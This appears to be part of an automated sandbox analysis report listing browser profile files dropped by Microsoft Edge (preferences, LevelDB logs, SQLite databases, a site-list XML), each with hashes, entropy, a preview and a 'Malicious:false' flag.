              SHA-512:5754B0524F2274374496546132C81BC483A2E31F3616D0D4A2715B8E2BBB2387547FA7E84DB0FCF026E5C362A6590EFD4167FDC1AD99B6E193DD4CE4186CE8EF
              Malicious:false
              Reputation:unknown
              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13353677849058639","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13353677849058639","location":5,"ma
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):764
              Entropy (8bit):4.983996475744972
              Encrypted:false
              SSDEEP:
              MD5:4FDF718428FC68BE3994B430B46A1FD8
              SHA1:329C34BC736351398EDEC09C5E9228664743F654
              SHA-256:075152763F646ABC35B719718F1E72669BA13609566F67EC2CDD8863FB7AC33B
              SHA-512:7CDD2CC6780855FF5E6A9A1D72A908BEAFA0120B724D42CAB68A041A3E9BE7116B347755DC6B822D44CAC73851AB8C79CA2A994190CF8A0821F01D8E1C0E634D
              Malicious:false
              Reputation:unknown
              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f..................[y................next-map-id.1.Znamespace-428ec92a_2c7c_4dea_b299_48c4bc44fc41-https://microsoftedgewelcome.microsoft.com/.0V.e................e.H.y................next-map-id.2.Znamespace-ac109274_e6bb_4a5d_83ff_9a5795c418f0-https://microsoftedgewelcome.microsoft.com/.1. .................. .................. .................. .................Om..p................map-0-_cltk.m.e.m.g.o.7..Hmap-0-Thu Feb 29 2024 11:57:41 GMT+0100 (Central European Standard Time).a.jp................map-1-_cltk.k.a.6.c.w.d..Hmap-1-Thu Feb 29 2024 11:57:46 GMT+0100 (Central European Standard Time)..................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):324
              Entropy (8bit):5.158349340116888
              Encrypted:false
              SSDEEP:
              MD5:26BBE8B04B5F3556A6BBC620BA630896
              SHA1:862B117249EADD3B54F68F01F68A463D8C0F61CB
              SHA-256:81F55111C5836AF4C01FBB164D68B54DA307B6C4F64932BD8458EA6C8371F9D5
              SHA-512:82A243ACE26C7B32ACFB1B866FA89C0AA6720790305E9B93846364CD9F98156F723BA57ADB400C4A78385CB852C07838AABD6DAB608C811FE6D5CC7DB279F09E
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:31.975 1be0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/02/29-11:57:31.976 1be0 Recovering log #3.2024/02/29-11:57:31.982 1be0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):9717
              Entropy (8bit):4.12291261282509
              Encrypted:false
              SSDEEP:
              MD5:3F8935EF2B025305A63F416794429E70
              SHA1:8D6388E9A6C3153CFE8C66B19C6138823B24285F
              SHA-256:1B4D753116EA9A5FEEC0896131F79B5A1CEC3244176AE071801CEADF3D9F7AC6
              SHA-512:DE7F22B53A60E4FAA181EFDC9C8EDFD407684F44AB4BA7461674AC6905214C139D7F86F15C2277661C84D5A7E6F9C0D4397BEA1EE57A9F648B51D079221E1356
              Malicious:false
              Reputation:unknown
              Preview:SNSS.......c..t...........c..t......"c..t...........c..t.......c..t.......d..t.......d..t....!..d..t...............................c..td..t1..,...d..t$...428ec92a_2c7c_4dea_b299_48c4bc44fc41...c..t.......d..t......A........c..t...c..t.......................c..t....................5..0...c..t&...{EF4DAEC1-3482-49FB-8354-00340DC19E1A}.....c..t.......c..t...........................d..t...............d..t....Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47...........................Microsoft Edge......117.....Not;A=Brand.....8.......Chromium....117.........Microsoft Edge......117.0.2045.47.......Not;A=Brand.....8.0.0.0.....Chromium....117.0.5938.132......117.0.2045.47.......Windows.....10.0.0......x86.............64.................d..t...............d..t....Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47.........................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
              Category:dropped
              Size (bytes):20480
              Entropy (8bit):0.44194574462308833
              Encrypted:false
              SSDEEP:
              MD5:B35F740AA7FFEA282E525838EABFE0A6
              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):349
              Entropy (8bit):5.139866510856282
              Encrypted:false
              SSDEEP:
              MD5:058AE27C65C56C79FE9F5FCAC7C4F615
              SHA1:095076F8D0ABDC34ADE71465B0B7DDFE343D2229
              SHA-256:5C4130C5362FB8B9F335DAD7B1D6BF3DC1170B39FA34279043E14F782A6C3629
              SHA-512:F37E080ABEAE24B73294DDD522BBE0246A761D9311E7890D8F272622E36E6402B84AAB1D46776C9B5693CA9C1FBEE5685E5197D529A0B93413D933CF67BF7666
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.015 9d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/02/29-11:57:29.023 9d8 Recovering log #3.2024/02/29-11:57:29.024 9d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):705404
              Entropy (8bit):4.69800839097965
              Encrypted:false
              SSDEEP:
              MD5:ECF772746DECBE102BD2F0FC75732FF4
              SHA1:9C1F83C067DA762BAD2B4C69EF458801B1F746AB
              SHA-256:351FE304DE3204BDC58413C14E1252541E60D88CAE5FCD88BCEBA5D93074264D
              SHA-512:42DEC8082A017FBE29B570FA6F51634A79BD66E34D0F8D87AA594D2ED5B155AD4D78DA8F6A778815D9CD16DB0CA7CC47B9BE685834D6E8EE9D186F81C2F065B1
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0"?>.<site-list version="97">. <site url="0rga.org">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="100partnerprogramme.de">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="10bet.co.uk">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="12circuit.state.fl.us">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="12stream.de">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="12thman.com">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="17thswscoutsleeds.org.uk">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="1822direkt-banking.de">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="1987ser.co.jp">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="1newhorizon.in">. <open-in allow-redirect="true">MSEdge</open-in>. </site>. <site url="1q.com">. <open-in allow-redirect="true">MSE
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):270336
              Entropy (8bit):0.0012471779557650352
              Encrypted:false
              SSDEEP:
              MD5:F50F89A0A91564D0B8A211F8921AA7DE
              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):434
              Entropy (8bit):5.217474409320027
              Encrypted:false
              SSDEEP:
              MD5:FDF5A3ACFBD637F85786CC47A28FC4F3
              SHA1:2DCCA13608AA26AAFAA563A474355E0A05EA2A05
              SHA-256:10FB56C0023ECB88CDB4997EAC6307FC037AD266C2A17C6ACE76636D8DCA639A
              SHA-512:7C42EF2C9C272C1F5050E5F8DCDACEB66D67DD6E9E0D954D1EE6DADD1E9650C9CDFDEABD222DB1F96163C94E9D98D692CAB8B83155362CB4C680E6FC0489935B
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.572 1be0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/02/29-11:57:29.575 1be0 Recovering log #3.2024/02/29-11:57:29.580 1be0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):40
              Entropy (8bit):4.1275671571169275
              Encrypted:false
              SSDEEP:
              MD5:20D4B8FA017A12A108C87F540836E250
              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
              Malicious:false
              Reputation:unknown
              Preview:{"SDCH":{"dictionaries":{},"version":2}}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:20D4B8FA017A12A108C87F540836E250
              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
              Malicious:false
              Reputation:unknown
              Preview:{"SDCH":{"dictionaries":{},"version":2}}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
              Category:dropped
              Size (bytes):36864
              Entropy (8bit):0.3886039372934488
              Encrypted:false
              SSDEEP:
              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):80
              Entropy (8bit):3.4921535629071894
              Encrypted:false
              SSDEEP:
              MD5:69449520FD9C139C534E2970342C6BD8
              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
              Malicious:false
              Reputation:unknown
              Preview:*...#................version.1..namespace-..&f.................&f...............
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):422
              Entropy (8bit):5.211915945012451
              Encrypted:false
              SSDEEP:
              MD5:59EEB39851BDCA6240331F924EECDD0C
              SHA1:5D6020CC25B1AD064B6A2368FF3F5B9C8B3DD42F
              SHA-256:524AEB2F4F2D2B9FEB42B6953D9FDCEA5E9FB13120716C7311BE3B418C9BDE96
              SHA-512:7E02923A50DBE5AF9A46143247981D75F26E6D162D6606B3FBFB34FDC0D4370131B841E26C28940977D42ECD3985DC3930BBAAAC796E2D8106E870007C6DBDD5
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:44.919 1be0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/02/29-11:57:44.920 1be0 Recovering log #3.2024/02/29-11:57:44.927 1be0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):328
              Entropy (8bit):5.170942232906757
              Encrypted:false
              SSDEEP:
              MD5:78357FEAAC495344B3F603A80EA655FC
              SHA1:84113B706A7DF203C96FAB46B35C6BB59C21C374
              SHA-256:DA1F1FE5EF705F7C098AB8F51A509CAB81D0579CED417A68B116DA972379553F
              SHA-512:F6F521F6EBADD213E0976CA4A7D68B1D728A352FAD321CA35E3DAF3581AE7D672DA390917CA101A666FDD2FE5ABF8D35182D171396EB115C4181E068AE67B72B
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.044 1a04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/02/29-11:57:29.047 1a04 Recovering log #3.2024/02/29-11:57:29.048 1a04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):131072
              Entropy (8bit):0.0033769341339387224
              Encrypted:false
              SSDEEP:
              MD5:46632950DE6EDA0A9C03A07D17CFAFF6
              SHA1:0BAD9CA318F9C62DFCE7411A4B897375174E5C70
              SHA-256:9591F8F16F4B4128FF03B11335F39F76865C57A950B9267400ECD9C0CB9FE843
              SHA-512:7356E48E31FD39ECB16D032CBF1121737B9FCDA7332E13E32DF1025872E3325F916ACE0555CC1278A33024686CBA7C40050F62350A7F7381804C215792DD5E0C
              Malicious:false
              Reputation:unknown
              Preview:VLnk.....?......}......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 11, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 11
              Category:dropped
              Size (bytes):196608
              Entropy (8bit):1.2650839000308212
              Encrypted:false
              SSDEEP:
              MD5:68FF9EC697D95A3F1E205166B294B75E
              SHA1:7FE61631EA4F6638EEF67D1F3F906A2A6EA69731
              SHA-256:C8A3670DC354AFD09907227AA112B20990047F7C92A7F5B93D42E610DDA2E8F0
              SHA-512:440853857B981E2F3C4D98C35478FE087E820D302CDCEFB3C1B50754D99A2E58E13D69BB1B2078B24F93E80FCD9AADE04234A60654F163F3AAEF44487DAA809C
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):2568
              Entropy (8bit):0.06569804787746028
              Encrypted:false
              SSDEEP:
              MD5:A5822D5381D25334739FAB134CDE95F8
              SHA1:AEEDC7BA33FF1AB6C1333565270E7051484EB6A6
              SHA-256:7607134F80654F145B6F2F140A8DCA53710764DFCA59F35F9E4640884F678682
              SHA-512:678778D922E530DEDCA9FA7CE1FC7BEE8C2AF37CFD3867942536C55286AFF1C7E44101AB59F6DFE1F3830B68D375183A5D6C27401D3CFC39E766C93934D1B11E
              Malicious:false
              Reputation:unknown
              Preview:.............?.....`.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
              Category:dropped
              Size (bytes):40960
              Entropy (8bit):0.41235120905181716
              Encrypted:false
              SSDEEP:
              MD5:981F351994975A68A0DD3ECE5E889FD0
              SHA1:080D3386290A14A68FCE07709A572AF98097C52D
              SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
              SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with very long lines (3951), with CRLF line terminators
              Category:dropped
              Size (bytes):11755
              Entropy (8bit):5.190465908239046
              Encrypted:false
              SSDEEP:
              MD5:07301A857C41B5854E6F84CA00B81EA0
              SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
              SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
              SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
              Malicious:false
              Reputation:unknown
              Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
              Category:dropped
              Size (bytes):115717
              Entropy (8bit):5.183660917461099
              Encrypted:false
              SSDEEP:
              MD5:3D8183370B5E2A9D11D43EBEF474B305
              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
              Malicious:false
              Reputation:unknown
              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
              Category:dropped
              Size (bytes):28672
              Entropy (8bit):0.3410017321959524
              Encrypted:false
              SSDEEP:
              MD5:98643AF1CA5C0FE03CE8C687189CE56B
              SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
              SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
              SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):701379
              Entropy (8bit):4.55874584473803
              Encrypted:false
              SSDEEP:
              MD5:F912C3FEBBD5536ECB9DFAA4AD08EC33
              SHA1:089D859952171A8A816D22AD24E8942E4B333723
              SHA-256:1D874B980A48EC1EB5E3248A8A51D8421285377B438349CF26C074CC19401E9F
              SHA-512:7D9E8BC6B9ABACBFDBA767AF053FDCEFF7E3DCC5A8B695C312DD3AD589186A96666F59A1A1453D2DC99358F100B99C193F6B96A09B7B7B34FB0D8B4C8D1248C7
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):703600
              Entropy (8bit):4.566113417651193
              Encrypted:false
              SSDEEP:
              MD5:9333CCFCF99095E50416CE49AE2809A2
              SHA1:A477761D1B31D51F6FB9C9C55C9894E577DFF1EE
              SHA-256:CC8F29C0A3D20F083C1230E95227A2F982635E3A305F9019D3EE6466EDF28148
              SHA-512:D4A121C42CD6B85BEC0CA672992D673B5607135E96B8364B4B146D59AF1A6AA2A97BA5ECF76F188DC2F415AC595989E8F755C9622696F1E706FB861A40C273B3
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):32768
              Entropy (8bit):0.2920627962491444
              Encrypted:false
              SSDEEP:
              MD5:B7AF0E63E5DA7CF4C70AEC4D983F25A8
              SHA1:906BB645D873D464BFE0A21E442C12ECB5D72FC7
              SHA-256:45FABBA0DED184000B45769FAC2A08B6FF77B7A3D05DAAC4C706EDAA900A6516
              SHA-512:EE7BC0062188D9E9CA1C0AEF61C1D5BEB06E9D80DA474D8F190C17DBFEA82E5E6E40277E66F9DEB1E1C51BF844CA891A78C080F0A5759E8E5C298CDC9FBA2920
              Malicious:false
              Reputation:unknown
              Preview:..-.....G.......-...........l!.o....[.{....r[..-.....G.......-...........l!.o....[.{....r[........)...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite Write-Ahead Log, version 3007000
              Category:dropped
              Size (bytes):1240152
              Entropy (8bit):2.7717282780034482
              Encrypted:false
              SSDEEP:
              MD5:178C9FA691EE9C4E09C667B3F4EDB18F
              SHA1:6CEE5236446C8C03FC5E6ACBDD632317410256C1
              SHA-256:DACF218E147B308C6D8E600DB9413CC892E18E87BB15CFA806FE56AA6E2A3455
              SHA-512:8991D146C8DC22070054E8D7D1C7068435108F2784F1DB41CFD9286DCA27302FEA215B51E63E24429F67BF5EC6FB9842950C3781DFA6522A2205BB092F09A17C
              Malicious:false
              Reputation:unknown
              Preview:7....-...........o....[..r..q.^.........o....[.p..O..PSQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):3462
              Entropy (8bit):5.601146710938695
              Encrypted:false
              SSDEEP:
              MD5:F2AAE31003118A647B22F8D474CC9578
              SHA1:F761B239F73A4CBA84D7A64A8F5A31D41C0B37A9
              SHA-256:4DA4F700CCAA0909ED854302867F684280D5701A87E930161856C84B35C28080
              SHA-512:0032E30D67B0C5BF56516582E142BDA7A25F48F5FFB44BF72C3CD7D8960FBB1AF00E0CB0FB759D560F94B3F926E944D669B45AE36F1CDD7AD766EAAA3254A92E
              Malicious:false
              Reputation:unknown
